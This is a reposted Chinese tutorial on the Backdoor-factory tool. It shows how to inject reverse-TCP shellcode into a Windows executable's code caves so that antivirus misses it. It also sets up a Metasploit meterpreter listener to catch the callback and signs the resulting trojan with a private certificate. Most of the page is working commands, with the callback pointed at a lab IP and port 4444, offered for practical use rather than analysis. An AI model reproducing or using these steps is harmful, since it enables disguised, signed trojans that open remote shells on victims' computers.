加入收藏 | 设为首页 | 会员中心 | 我要投稿 天津站长网 (https://www.022zz.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 服务器 > 系统 > 正文

后门免杀工具-Backdoor-factory

发布时间:2021-02-19 21:29:29 所属栏目:系统 来源:网络整理
导读:副标题#e# 水一水最近玩的工具?弄dll注入的时候用到的 ? 介绍这款老工具?免杀效果一般。。但是简单实用 ? ? ? ?目录: 0x01?backdoor-factory简介 0x02?特点功能 0x03?具体参数使用 PS:后门添加私钥证书 ? ? https://tools.kali.org/exploitation-tools/bac

后门免杀工具-Backdoor-factory

?

?

安装github都有。

?

?

?

?

查看是否支持后门patch

-f:指定测试程序
-S:检查该程序是否支持 patch

backdoor-factory -f kui.exe -S

?

?

指定的?shellcode patch

backdoor-factory -f kui.exe -c -l 200

-c:code cave(代码裂缝)
-l:代码裂缝大小

?

?

?

查看支持哪些 payload 的注入:

backdoor-factory -f kui.exe -s show

?

?

?

注入payload

backdoor-factory -f kui.exe -s iat_reverse_tcp_stager_threaded -H 192.168.5.4 -P 4444

-s:选择使用 payload 类型
-H:选择回连服务器地址
-P:回连服务器端口

?

选择了code cave的序号即可完成

?

msf监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.5.3
set lport 4444
exploit

?

后门免杀工具-Backdoor-factory

?

? 对比原文件与生成文件MD5值
md5sum ./kui.exe /root/kui.exe

?

?

常用参数

-c:code cave(代码裂缝)

-l:代码裂缝大小

-s:选择使用 payload 类型

-H:选择回连服务器地址

-P:回连服务器端口

-J:使用多代码裂缝注入

?

?

?

PS:看手册是可以添加自己的私钥证书在我们的马儿里面~~~

?

?看了网上好像没人写这个

?

使用:将私钥放在一个文件里:

echo -n yourpassword > certs/passFile.txt

?

证书格式:

signingCert.cer => certs/signingCert.cer
signingPrivateKey.pem => certs/signingPrivateKey.pem

?

证书目录:

certs
├── passFile.txt
├── signingPrivateKey.pem
└── signingCert.cer

?

?

这时候我们需要使用C参数?生成win32pe代码裂缝插入私钥部分。

例子:

./backdoor.py -f kui.exe -s iat_reverse_tcp_inline -H 192.168.5.4 -P 4444 -m automatic -C

(编辑:天津站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读